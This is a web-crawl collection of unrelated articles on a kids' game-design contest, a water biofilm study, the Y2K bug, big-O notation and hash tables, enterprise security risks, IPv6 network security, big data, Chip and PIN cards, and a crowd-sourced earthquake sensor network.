will have more than 2 million job openings in STEM-related
fields by 2014, yet fewer than 15 percent of U.S.
college undergraduates now pursue degrees in science or engineering. Of course,
it's not just about jobs. We need more STEM
graduates to create the next innovations so important to the U.S.' future
Kodu features include:
- A visual user menu that requires no experience to create 2-D or full 3-D
interactive video games.
interactive system that guides users through each step of making a game-creating
terrain, adding characters and programming them.
community feature that enables sharing games with other PC-based Kodu Game Lab
- Visual language that eliminates syntax errors with no cryptic error messages
Microsoft also announced the Kodu Cup, a U.S. game competition for kids from 9
to 17 years old. Contestants are to design their own video game for the PC
using Kodu. Winners will have the chance to win $5,000 for themselves as well
as $5,000 for their school, some great technology, and a trip to the Worldwide
finals of Microsoft's Imagine Cup competition. Games are a great way to engage
students and there is a lot of momentum with educational video games in the
classroom and beyond, Microsoft officials said.
also releasing a classroom kit for teachers to easily implement Kodu into their
curricula," Cheng said. "Hopefully, Kodu can play a role in helping
children learn and encouraging more children to become future video game
designers, engineers or scientists."
March 16, kids can enter the competition. Interested parties can read the
official rules and learn more at http://koducup.us
kids have a natural passion for video games and video game design," said
Michael H. Levine, Ph.D., executive director of the Joan
Ganz Cooney Center
at Sesame Workshop, in a statement. "Microsoft's Kodu Cup is a great way
to harness that passion and apply it in a way that helps improve academic
achievement, skills and interest in the careers of the future, which are going
to fuel our country."
research has shown that Kodu Game Lab appeals equally to girls and boys and
helps promote creativity, self-confidence, critical thinking and technology
skills," Microsoft's Cheng said in a statement. "Kids don't feel like
they're programming so much as playing, even though they're creating
sophisticated worlds, characters and storylines." | <urn:uuid:a560cbfb-dd23-4177-ac68-4a63ee08755f> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Application-Development/Microsoft-Kicks-Off-Kodu-Kids-Programming-Game-Design-Contest-727949 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00372-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938194 | 890 | 2.90625 | 3 |
Mahapatra A.,Bhubaneswar Scb Medical College |
Mahapatra A.,SCB Medical College |
Bhatt M.,SCB Medical College |
Jena S.,SCB Medical College |
And 2 more authors.
Journal of Clinical and Diagnostic Research | Year: 2015
Context: A biofilm is a layer of microorganisms contained in a matrix (slime layer), which forms on surfaces in contact with water. Their presence in drinking water pipe networks can be responsible for a wide range of water quality and operational problems. Aim: To identify the bacterial isolates, obtained from water pipelines of kitchens, to evaluate the water quality & to study the biofilm producing capacity of the bacterial isolates from various sources. Settings and Design: A prospective study using water samples from aqua guard & pipelines to kitchens of S.C.B Medical College hostels. Materials and Methods: Standard biochemical procedures for bacterial identification, multiple tube culture & MPN count to evaluate water quality & tissue culture plate (TCP) method for biofilm detection was followed. Statistical analysis: STATA software version 9.2 from STATA Corporation, College station road, 90 Houston, Texas was used for statistical analysis. Results: One hundred eighty seven isolates were obtained from 45 water samples cultured. The isolates were Acinetobacter spp. (44), Pseudomonas spp.(41), Klebsiella spp.(36) & others. Biofilm was detected in (37) 19.78% of the isolates (95% CI 30.08% -43.92%) including Acinetobacter spp.-10, Klebsiella spp. - 9, Pseudomonas spp. - 9, & others, majority (34) of which were from kitchen pipelines. Conclusion: Water from pipeline sources was unsatisfactory for consumption as the MPN counts were > 10. Most of the biofilm producers were gram negative bacilli & Pseudomonas & Acinetobacter spp. were strong (4+) biofilm producers. © 2015, Journal of Clinical and Diagnostic Research. All rights reserved. Source | <urn:uuid:1e6607f3-3916-4341-953d-2198d1c7aff7> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/scb-medical-college-277764/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00188-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.931186 | 442 | 2.53125 | 3 |
Warning: This year might bite! Armed and considered extremely dangerous to automated systems!" Perhaps we should put up wanted posters in all public places or place a label on every calendar. Some call it the year-2000 problem, others the Millennium Bug, and still others the Y2K problem; but whatever you call it, call it a serious problem. Of course, there are many people who, for whatever reason, don't believe it, are still hoping for a "silver bullet," or are just plain mad at the whole thing.
What is the year-2000 computer glitch? Simply stated, programmers in the past used two digits, instead of four, to describe the year. Thus 1997 became 97, and 2001 would become 01. If someone says to you "I was born in 45," you would quickly assume they were born in 1945. Your mind makes a logical conclusion that the person could not still be alive if they were born in 1845 and obviously could not have been born in 2045, so they must have been born in 1945. Your mind used deductive reasoning -- one of the many affable traits of human beings.
Unless a programmer has instructed a computer, through a program, to make the same sort of deduction, the computer will not make any assumption at all. For instance, assume for a moment the year is 2000 and a computer program is to calculate a person's age but is given only the last two digits of a person's birth year (say 45). The computer will perform as it has been instructed, i.e. it will subtract the birth year from the current year to calculate the age. In this case it will calculate current year - birth year = computer age, e.g. 00 - 45 = -45. Of course, the correct answer is really 55. But in this simple, but realistic, example the computer did not "blow up" or stop working, or anything obvious -- it just gave the wrong answer.
Problem Occurs at Three Levels
This problem can occur at three levels. The first is the most obvious: in traditional "mainframe" computers. These systems are dominated by older computer languages such as COBOL, which encouraged significant independent programming. While these programs served their entities extremely well and have paid for themselves many times over, they generally were not written for years beyond 1999.
The second place to look for this problem is in embedded process controllers. "What's that?" you ask. It is any automated process controlled by a computer chip, such as personal computers, security elevators and doors, telephone switches, traffic lights and electric utility sub-stations. This problem is truly a "Year 2000 Bug." When the microchip was invented, the BIOS (Basic Input Output System) of these chips was designed only to have a two-digit year. A personal computer containing a faulty chip might change its internal date to Jan. 1, 1980, when restarted after Dec. 31, 1999. By the way, Jan. 1, 2000, is a Saturday but Jan. 1, 1980, was a Tuesday, a situation that may cause business doors to be unlocked when they should be automatically closed.
The third place to find the year-2000 problem is, unfortunately, largely overlooked. The third problem is hidden in data. For instance, how will spreadsheets be interpreted after Jan. 1, 2000, when staff has entered only the last two digits of the year for the last several years? The answer depends on the spreadsheet being used. If Excel or Lotus 1-2-3 is being used, it also depends on programmers in Utah (where Lotus 1-2-3 is manufactured) or Washington (where Excel is manufactured). These two popular spreadsheets provide different answers and very little documentation. As long as customers of these systems enter data in its abbreviated two-digit year form, there will be a year-2000 problem when those dates are compared to other dates after the year 2000.
How is the problem fixed? Technically the year-2000 problem is not very challenging. Even novice COBOL programmers can find and correct the use of two-digit year identifiers. Several techniques are available to help embedded process controllers. What makes the problem difficult is two related issues. One, many different areas must be examined and fixed. A medium-size local government may have millions of lines of code -- nearly any of which could contain tests that use dates. Invalid date comparisons can occur in computer programs, training, embedded processors, and in existing data. This becomes a massive inventory, remediation and testing campaign. In short, it requires an extensive management effort to prioritize and execute a plan that will avert problems in time.
And time (or lack thereof) is the second complicating issue. Very little time remains before the year 2000. This is one deadline that will not slip or be delayed. There is no reprieve -- no extension. Worse, even now the problem is manifesting itself in systems that project a result into the future.
To make wise use of the little time that remains, a local government must do a comprehensive inventory of all its automated applications -- mainframe, enterprise servers, telephone switches, etc. Governments must determine which applications will be compliant and which ones will not be using thorough testing techniques. Governments must prioritize the results and find out what remediation steps are required, so plans can be constructed to fix the problem. Finally, local governments must determine which applications can be fixed on time. Contingency plans will be very important for those applications that can't be fixed in time.
Only a few ways exist to fix the year-2000 problem. There appear to be only five recognized ways to fix programs and data affected by the use of two digits to represent year. The International Standard (ISO 8601), adopted by ANSI (American National Standards Institute) requires that all dates be expressed in yyyymmdd format (sometimes dashes are included separating the year-month-day fields) using leading zeroes where appropriate. Thus Jan. 1, 2000, would be 20000101 and Dec. 31, 1999, would 19991231. The ISO 8601 standard is the most intuitive and easiest way to express dates. But it has its drawbacks.
The second and third techniques are called windowing -- fixed and sliding. The idea behind both techniques is to choose, based upon the application, a 100-year segment of time. In a fixed window system, all two-digit years are compared to the selected 100-year segment. For instance, assume a file contained the date 12/25/45 and the 100-year segment is 1940 to 2040. The year would be compared to 40. Since 45 is greater than 40 a 19 is applied for the century. If the two-digit year were less than 40, a 20 would be applied for the century. In the terminology of "windowing" the years selected become "pivot" years -- meaning the century is pivoted based upon the "pivot" years comparison.
Obviously, over time, the fixed window technique becomes obsolete. Thus the concept of a "sliding window" was developed. It is similar to the "fixed" concept, except the pivot years are based upon the current date. So instead of a fixed 100-year period, as in the "fixed window" technique, a "sliding" 100-year period is selected. For example, instead of selecting 1940 and 2040, the sliding technique might use 48 years previous and 52 years from now as pivot points. The same logic is applied as in the fixed window technique, e.g. if the two-digit year is greater than the first pivot point (current year minus first pivot point) the century 19 is applied but if it is less than the second pivot point (current year plus second pivot point) then the century 20 would be assumed. One of the advantages of using a sliding window approach is different pivot points can be selected for different applications, but, as in the fixed window technique, the pivot points indicate a specific 100-year period.
The fourth technique relies on computer math and often is called "encryption." Without trying to describe why, it is well-understood the American date, 12/31/99, can be stored in six numeric computer bytes and with a little bit of rearranging can be used for comparing two dates, i.e. rearrange to 991231. But after extending the date (to include a four-digit year), a programmer can store 19991231 in five computer bytes simply by making the field binary. Thus a programmer can store the complete date, using one byte less, through the use of a computer mathematical "trick."
The final technique relies on the fact that the Georgian calendar repeats itself every 28 years. Twenty-eight years ago it will be the same day of the week and the same day of the same month. It is called the encapsulation method. This technique is hotly debated but is probably a very useful concept for some embedded process controllers where the actual year is not important. But it is not a recommended technique for systems with complex programming.
The Good, the Bad and the Ugly
No, we are not talking about another spaghetti western. What techniques make the most sense? ISO 8601 makes the most sense, because it is the most intuitive. It is also the most expensive technique available. Converting to ISO 8601 means three things. One, all significant date fields in any existing databases (active, archived and security files) must be converted. Two, every program in an application must be checked for significant date usage and converted. And three, the entire application has to be converted from its previous form to the new form all at once. However, most standard setting bodies have looked to the ISO 8601 technique as the best technique.
Fixed windowing has the obvious drawback that soon it would become obsolete. As the years advance, the future-year pivot point draws nearer, and the bottom pivot point draws farther away, therefore less useful to the application. Fixed windowing has a very limited use, if at all. The advantage in using the sliding window technique is that data need not be converted and, for most applications, production programs can be gradually converted. The decision to use this technique probably rests on the amount of time remaining to make year-2000 fixes and the amount of money available. However, if the 100-year period is well selected, this technique may be permanent and cheaper than ISO 8601.
Like the ISO 8601 format, above, the encryption method will require changes to the data and programs and might require an "all-at-once" conversion. It does avoid having to buy additional permanent memory and it is easily explained to the IT professional. The encapsulation method is, perhaps, useful only in embedded process controllers in which the actual year is not important, but the day of the week is very important. For such specialized applications its use might save considerable time and effort.
What if we don't finish? After a thorough inventory, and before remediation is in full swing, it is crucial, though difficult, to determine if the government's efforts will result in compliant systems. And if not, what will your city or county do? If your city's unable to bill for water and sewer services until June 2000, what contingency plan will you have in place?
"There will not be enough time and/or money to fix everything. As triage principles are applied, some low-priority systems will not be fixed at all. Similarly, some medium-priority systems may not be thoroughly tested. Finally, some mission-critical systems may still have errors, even after thorough testing, just due to complexities and oversights" (see for a very technical presentation of Y2K Contingency Planning Requirements by MITRE Corp.). Both time and available resources have diminished. If a local government is not well into its remediation efforts the time this article [is published], then action steps must include development of a contingency plan.
After a thorough and complete inventory of potentially affected systems, rigorous prioritization of those systems must be accomplished. This must, of necessity, involve an evaluation of essential services provided by the local government. It is essential that top management performs or at least directs this effort.
After all potentially affected systems have been prioritized and remediation efforts are under way, estimates to fix crucial applications may exceed the available time. In those cases, contingency plans must be developed and the prioritized list reordered.
How bad will it really be? Many predict doom-and-gloom scenarios. They argue that financial institutions won't function, electric utility companies will lose their electric grids, and governments will fail. We know that many local governments have made corrective actions and that many more are on schedule to complete remediation. Large numbers of financial institutions have pulled millions of dollars into this problem. But a question remains, how many entities have done nothing? Unfortunately, those entities that have done the most work in addressing this problem are the most concerned. In this world of interconnected automated processes, some critical mass of compliant entities is necessary to avoid a large-scale problem.
Be a good scout! "Be prepared" is the official Scout motto. There is no better credo for local government anywhere. The most effective advice we can offer local governments is to start today, if you have not already, and urge your local businesses to do the same.
Copyright 1998, Public Technology Inc.
November Table of Contents
By Michael Humphrey
Director of telecommunications and information, Public Technology Inc.
Reprinted by permission of Public Technology Inc., the nonprofit technology organization for local governments. PTI is the technology arm of the National League of Cities, the International City/County Management Association, and the National Association of Counties. | <urn:uuid:d2ed4a62-e1b7-491d-852f-2864fe3da293> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/The-Year-2000-Is-Coming.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00400-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946287 | 2,816 | 2.71875 | 3 |
Definition: A theoretical measure of the execution of an algorithm, usually the time or memory needed, given the problem size n, which is usually the number of items. Informally, saying some equation f(n) = O(g(n)) means it is less than some constant multiple of g(n). The notation is read, "f of n is big oh of g of n".
Formal Definition: f(n) = O(g(n)) means there are positive constants c and k, such that 0 ≤ f(n) ≤ cg(n) for all n ≥ k. The values of c and k must be fixed for the function f and must not depend on n.
Also known as O.
See also Ω(n), ω(n), Θ(n), ~, little-o notation, asymptotic upper bound, asymptotically tight bound, NP, complexity, model of computation.
Note: As an example, n² + 3n + 4 is O(n²), since n² + 3n + 4 < 2n² for all n > 10 (and many smaller values of n). Strictly speaking, 3n + 4 is O(n²), too, but big-O notation is often misused to mean "equal to" rather than "less than". The notion of "equal to" is expressed by Θ(n).
The importance of this measure can be seen in trying to decide whether an algorithm is adequate, but may just need a better implementation, or the algorithm will always be too slow on a big enough input. For instance, quicksort, which is O(n log n) on average, running on a small desktop computer can beat bubble sort, which is O(n²), running on a supercomputer if there are a lot of numbers to sort. To sort 1,000,000 numbers, the quicksort takes 20,000,000 steps on average, while the bubble sort takes 1,000,000,000,000 steps! See Jon Bentley, Programming Pearls: Algorithm Design Techniques, CACM, 27(9):868, September 1984 for an example of a microcomputer running BASIC beating a supercomputer running FORTRAN.
Any measure of execution must implicitly or explicitly refer to some computation model. Usually this is some notion of the limiting factor. For one problem or machine, the number of floating point multiplications may be the limiting factor, while for another, it may be the number of messages passed across a network. Other measures that may be important are compares, item moves, disk accesses, memory used, or elapsed ("wall clock") time.
[Knuth97, 1:107], [HS83, page 31], and [Stand98, page 466] use |f(n)| ≤ c|g(n)|. In computational complexity theory "only positive functions are considered, so the absolute value bars may be left out." (Wikipedia, "Big O notation"). This definition after [CLR90, page 26].
Strictly, the character is the upper-case Greek letter Omicron, not the letter O, but who can tell the difference?
Wikipedia Big O notation. Big O is a Landau Symbol.
Donald E. Knuth, Big Omicron and Big Omega and Big Theta, SIGACT News, 8(2):18-24, April-June 1976.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 31 August 2012.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Paul E. Black, "big-O notation", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 31 August 2012. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/bigOnotation.html | <urn:uuid:13e02966-ba07-4ef8-bc44-932ab402b7c6> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/bigOnotation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.860962 | 837 | 4.03125 | 4 |
Definition: A dictionary in which keys are mapped to array positions by hash functions. Having the keys of more than one item map to the same position is called a collision. There are many collision resolution schemes, but they may be divided into open addressing, chaining, and keeping one special overflow area. Perfect hashing avoids collisions, but may be time-consuming to create.
Also known as scatter storage.
Specialization (... is a kind of me.)
perfect hashing, dynamic hashing, 2-left hashing, cuckoo hashing, 2-choice hashing, hashbelt.
Aggregate parent (I am a part of or used in ...)
Aggregate child (... is a part of or used in me.)
load factor, hash table delete, collision resolution: coalesced chaining, linear probing, double hashing, quadratic probing, uniform hashing, simple uniform hashing, separate chaining, direct chaining, clustering.
See also Bloom filter, huge sparse array.
Note: Complexity depends on the hash function and collision resolution scheme, but may be constant (Θ(1)) if the table is big enough or grows. Some open addressing schemes suffer from clustering more than others.
The table may be an array of buckets, to handle some numbers of collisions easily, but some provision must still be made for bucket overflow.
explanation and example of hashing and various collision resolution techniques.
"The idea of hashing appears to have been originated by H. P. Luhn, who wrote an internal IBM memorandum in January 1953" [Knuth98, 3:547, Sect. 6.4]. He continues with more than a page of history.
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 16 November 2009.
HTML page formatted Mon Feb 2 13:10:39 2015.
Cite this as:
Paul E. Black, "hash table", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 16 November 2009. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/hashtab.html | <urn:uuid:d55fe51f-5ca6-4cdc-8d63-9ec05533b657> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/hashtab.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.898765 | 460 | 3.65625 | 4 |
Top Cyber Security Risks RevealedA report issued by The SANS Institute finds enterprise security efforts focused on fixing low-priority flaws at the expense of serious application vulnerabilities.
More than half of all cyber attacks hit two key areas: unpatched client-side software and Web applications.
These findings, along with several others, come from a report titled "The Top Cyber Security Risks," which was compiled by The SANS Institute. The report is based on intrusion data from 6000 companies and government agencies using TippingPoint security hardware and on malware data from millions of PCs monitored by Qualys.
The report, to be released on Tuesday, observes that major organizations typically take twice as long to patch application vulnerabilities as operating system vulnerabilities, despite the lower number of attacks on operating system vulnerabilities.
"In other words the highest priority risk is getting less attention than the lower priority risk," the report states.
More than 60% of attack attempts on the Internet target Web applications, the report finds. When successful, subsequent attempts to infect visitors to the breached site become much easier because the users tend to trust the sites they're visiting and often willingly download files from trusted sites, oblivious to the danger of hidden malicious payloads.
More than 80% of the software vulnerabilities being found by security researchers involve Web application flaws that allow attack techniques like SQL injection or Cross-Site Scripting, the report says.
Despite ongoing reports about Web flaws of this sort, the report says, most Web site owners fail to scan effectively for these common vulnerabilities.
The report also notes that zero-day vulnerabilities -- flaws disclosed prior to the availability of a fix -- are becoming more common. "Worldwide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times," the report says. "Some vulnerabilities have remained unpatched for as long as two years."
A shortage of skilled security researchers in both the security industry and in government organizations has made it harder for organizations to defend against these attacks. "So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks," the report says.
At the same time, the number of people with security skills -- for good or ill -- worldwide is increasing. As evidence of that, the report cites MS08-031 (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability), which was found independently by three researchers using different approaches.
"The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits," the report says.
InformationWeek has published an in-depth report on managing risk. Download the report here (registration required). | <urn:uuid:978cc967-7bcc-4a63-9425-1ad9a03890d4> | CC-MAIN-2017-04 | http://www.darkreading.com/risk-management/top-cyber-security-risks-revealed/d/d-id/1083111 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00244-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959568 | 578 | 2.546875 | 3 |
Is IPv6 infiltrating your network?Probably.Here’s what you need to know.
By Mark Mullins
The explosive growth of Internet-enabled devices is rapidly diminishing the supply of IPv4 addresses.In addition to computers, servers, routers, etc., addresses are being allocated to the “Internet of things,” including cameras, HVAC controls, alarm systems and a burgeoning constellation of connected sensors.As a result, in 2011 the Asia-Pacific Network Information Center began rationing its final block of /8 IPv4 address.Other regional registries will likely soon follow suit.
As if that weren’t enough, the widespread use of IPv4 network address translation (NAT) – which maps multiple private addresses to a single public IPv4 address – could ultimately hinder the use of IP-based communications services like VoIP and even degrade the performance of Internet backbone routers as they struggle to cope with increasingly massive routing tables.
So it’s not surprising that most modern operating systems now support dual stack IPv4 and IPv6 architectures; Windows 8, Windows Vista and Mac OS X 10.3 and later have IPv6 enabled by default.IPv6 devices will automatically configure a link local address for each of their interfaces and use router discovery to determine the addresses of IPv6 routers, access configuration parameters and global address prefixes.Even without a stateful configuration protocol such as DHCPv6, an IPv6-capable device can configure an IPv6 address for each of its interfaces.
While you may not be routing IPv6 traffic on your network, you still need to be concerned about IPv6-enabled end devices.Tunneling (which is supported in every OS and automatically enabled with the IPv6 stack) allows IPv6 transport over IPv4 connections and vice versa.IPv6 transport can be encrypted and used with anonymous (privacy addressing), but it does not use the EIU-64 constructed interface identifier that would allow you trace it back to the MAC address of the host.There are a number of tunneling mechanisms (see:NETSCOUT’ IPv6 white paper for a more complete discussion of them).The bottom line is that if you have a local tunnel within your intranet, you needn’t worry.But if you have a local device with a tunnel endpoint outside your network, it could allow access to your internal network that would likely be unprotected by firewalls or intrusion detection devices.
There are other potential vulnerabilities inherent to IPv6, including:
- Rogue router advertisements:Non-routers may advertise subnet addresses that should not exist on your network.This could simply be the result of IPv6 router or host configuration errors or – more concerning – an indication of malicious activity.By sending fake router advertisements, an attacker could fool other hosts on the subnet into sending it traffic (a “man-in-the-middle” attack).DHCPv6 spoofing works in a similar way.So it’s important to sniff out devices offering IPv6 stateful addresses.
- Open Ports:Since it’s less mature than IPv4, operating systems tend to leave more IPv6 ports open.It’s good practice to perform an IPv6 port scan to find open ports.Bear in mind that IPSec support is standard in any IPv6 stack, enabling devices to more easily encrypt end-to-end traffic while preventing firewalls from detecting the packet content.
While using malicious traffic to attack a network isn’t something new, IPv6-enabled devices may make it possible for an attacker to break into your network and extract data undetected using traditional methods through IPv6.
There’s an OptiView XG for that
So, now that you’re sufficiently terrified, what can you do to minimize the risks of IPv6 devices on your network?Fortunately, we’ve got you covered.
NETSCOUT’ OptiView XG portable network analysis tablet has the built-in capability to both passively and actively discover IPv6 devices and services.While other network analysis devices offer only passive discovery by monitoring IPv6 traffic and capturing IP and MAC addresses, they can’t categorize the devices based on the identified protocols.The OptiView XG, by contrast, transmits router solicitation requests in order to identify all IPv6 prefixes for the subnet and transmits neighbor solicitations to provide information on other IPv6 devices.It also provides visibility into router IPv6 Net-to-Media tables (the equivalent of an IPv4 ARP table) to discover link-local addresses off the attached subnet.And it can access Cisco router prefix tables that provide information on other subnets.
Of course, the OptiView XG also provides many other advanced capabilities to detect and diagnose potential security problems, such as downloads of restricted files and documents, the use of prohibited applications and risky P2P traffic.It can also help to identify and locate rogue or unsecured devices.Click here to see all that the OptiView XG offers.
Ready or not, IPv6 is coming
While it’s hard to say exactly when IPv6 will supplant IPv4, it’s only a matter of time.But right now, you need to be aware of the IPv6 enabled devices on your network and potential security risks they pose.Addressing those risks today will help you be ready when it’s time for the inevitable migration of your entire network to IPv6.
相关的 IT 网络资源
Continue to our The Decoder Blog for more on network troubleshooting | <urn:uuid:82e22b51-5e07-46ea-8b42-8e1b238f83bc> | CC-MAIN-2017-04 | http://enterprise-cn.netscout.com/content/eye-networks-ipv6-infiltrating-your-network-probably-here-s-what-you-need-know | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00180-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.875097 | 1,168 | 2.53125 | 3 |
5 Things to Know About Big Data in Motion
MikeEbbers 270001G1G2 Visits (9849)
As world activities become more integrated, the rate of our data growth has been increasing exponentially. This data explosion is making current data management methods inadequate. People are using the term big data to describe this latest industry trend. IBM is preparing the next generation of technology to meet these data management challenges.
Here are 5 things to know about big data in motion:
1. Big data is divided into “data in motion” and “data at rest.”
Data in motion is the process of analyzing data on the fly without storing it. Some big data sources feed data unceasingly in real time. Systems to analyze this data include IBM Streams, which we cover in this blog. Data at rest is a snapshot of the information that is collected and stored, ready to be analyzed for decision-making. We cover this in another blog.
2. Big Data has several characteristics that all begin with V.
3. IBM Streams allows for instantaneous processing of data in motion.
Not only is the actual data available right from the sources, but those sources are also interconnected in such a way that we can acquire that data as it is being generated. The acquisition of data is no longer limited to the realm of passive observation and manual recording. Where we once assumed, estimated, and predicted, we now have the ability to know and take action.
4. IBM Streams is installed on nearly every continent in the world.
Here are just a few of the locations of IBM Streams, and more are being added each year.
5. IBM Streams is inexpensive to install.
Over the past several years, hundreds of applications have been developed using InfoSphere Streams. These include such areas as:
For more information, read all about it in IBM’s Redbooks publication: Addr | <urn:uuid:58204276-923c-47a5-b6f1-fdc207842252> | CC-MAIN-2017-04 | https://www.ibm.com/developerworks/community/blogs/5things/entry/5_things_to_know_about_big_data_in_motion?lang=en_us | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00180-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947455 | 398 | 2.75 | 3 |
In yesterday’s post we explained what Chip and PIN cards are and how they’re catching on worldwide. Today I’d like to go over the benefits of Chip and PIN so you can see why so many countries are adopting the technology. Chip and PIN cards provide benefits to cardholders, merchants and banks, including:
Safety - Chip and PIN cards are more secure than traditional magnetic stripe cards, it is exceptionally difficult to copy the information stored on the card and the use of a unique PIN prevents the use of a lost or stolen card being used by someone else.
Faster Payments - with Chip and PIN, transactions are faster and there is no need to check a signature.
Fewer Disputes - Chip and PIN reduces fraudulent and disputed payments.
Customer Confidence - Chip cards are harder to counterfeit, and PIN numbers help prevent fraud involving lost and stolen cards.
Chip-enabled technology has the ability to eliminate the need for tethered devices to process payments in the field, making it a technology to keep an eye on for any business with a mobile workforce. | <urn:uuid:6d9b03c2-d006-4d0e-aeec-a619349bce31> | CC-MAIN-2017-04 | http://blog.decisionpt.com/chip-and-pin-benefits | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00574-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941542 | 220 | 2.65625 | 3 |
In Chile, Andres Sepulveda never saw the magnitude 8.8 earthquake coming in February, but his laptop captured the data during the catastrophe.
As an assistant professor at the University of Concepción, Sepulveda studies oceanography. But in January, just before he left for a vacation, he installed on his five-year-old laptop a USB motion sensor device. It’s part of an expanding seismic network, which has the potential to send warnings, save lives and bolster public safety efforts when an earthquake strikes. Called the Quake-Catcher Network (QCN), the project uses inexpensive motion sensors in computers to collect earthquake data in real time.
“I had this instrument as part of scientific curiosity,” Sepulveda said. “Chile is a seismic country so I had the idea it could get something while I was away. It was just a test, so I left it on top of a box on the floor of my office. And then the earthquake happened.”
On Feb. 27, the 90-second Chilean earthquake erupted off the coast of the Maule Region, killing more than 400 people and triggering blackouts and a tsunami. It was the country’s strongest earthquake in five decades.
Photo courtesy of the Quake-Catcher Network.
It took days for Sepulveda to get back into his office because shifted furniture blocked his door. Once inside, he found that the USB device on his computer remained intact and collected not only the earthquake information, but also about one hour’s worth of data on the aftershocks.
“He was really interested in the network,” said Elizabeth Cochran, an assistant professor of seismology at the University of California, Riverside, who helped develop the QCN. “Little did he know he would end up recording this earthquake a month later.”
Four years in the making, the QCN was developed by Cochran and colleagues at Stanford University to fill gaps in current earthquake monitoring efforts, hampered by 10 to 15 second reporting delays and costly equipment.
By forming a global web of seismic sensors that captures data on the spot, Cochran said, the network can be the key to an earthquake early warning system.
In an earthquake, shock waves rip through the group, but their speed is no match for electronic signals. The QCN could send messages to nearby locations seconds in advance — precious time that could be used to tell residents to find cover or for public safety departments to stop trains, raise fire station doors and shut off water and gas lines, which can prevent fires.
“When an earthquake starts, you can quickly determine the magnitude and the location,” she said. “What fire stations would love is a few seconds warning to open doors to that fire station so they can easily get equipment out.”
Monitoring earthquakes has traditionally been a dirty job. Research would include digging into the earth to install new seismometers near fault lines.
“My main frustration is we don't have a huge number of seismometers around,” Cochran said, “just because they're so expensive and it takes a lot of work to install them.”
The technology in the Information Age has given Cochran another, much cleaner, method for monitoring shaky ground: Rather than installing sensors deep in trenches, users can simply install software on their computers. The seismic network utilizes accelerometers — motion sensors that protect data on the hard drive if a laptop falls down or capture movement in video game controllers. Users can upload the sensor for $50 with a USB cable or download the program directly. Some of the newer laptop models have accelerometers already built in.
As more users install the sensors on their computers, seismologists can gather data from anywhere in the world in the case of an earthquake. The idea is to develop a dense network that feeds data to a central computer system to paint a more vivid picture of how an earthquake behaves in a given place and time.
But a sensor on a computer isn’t as sensitive as a regular seismometer. It measures ground motion in three directions and can measure an earthquake with a magnitude 4.0 or higher. But researchers must determine the difference between an actual tremor and somebody banging on a table.
“The main difference is our sensors are not as sensitive,” Cochran said, “so you get lower-resolution data.”
But when a computer senses a tremor, it shoots a signal to the researchers’ servers, Cochran said, and if the server receives multiple pings from the same area, it’s probably an earthquake.
Even though generating publicity for the network remains a challenge, the word is spreading, especially in the wake of the recent earthquakes.
The QCN has about 1,300 users on any given day logging on around the world, Cochran said, and up to 2,600 over a month. With the cheap price tag and simple installation, it’s no surprise how fast the network has been growing. And areas prone to earthquakes and other potential hazards attract new users.
“It's not really us asking them if they can help,” Cochran said, “but them asking us how they can help.”
In the future, Cochran and her colleagues plan to set up a database, so users can see which earthquakes their sensors recorded and how they contributed.
Since launching, the QCN has received funding from the National Science Foundation, the Southern California Earthquake Center and even UPS. (“They’re helping out with the costs of sending sensors overseas,” Cochran said.)
In the past few months, it hasn’t been a question of demand. In Chile, Cochran opened a Web page for citizens to volunteer to have a sensor installed at their house or office. But she said they had to shut down the site a few days later; some 700 volunteers responded, but they only had 100 available sensors.
“I think when people realize that they live in a place that has earthquakes, they definitely want to do more about it,” she said. “Any earthquake raises awareness.”
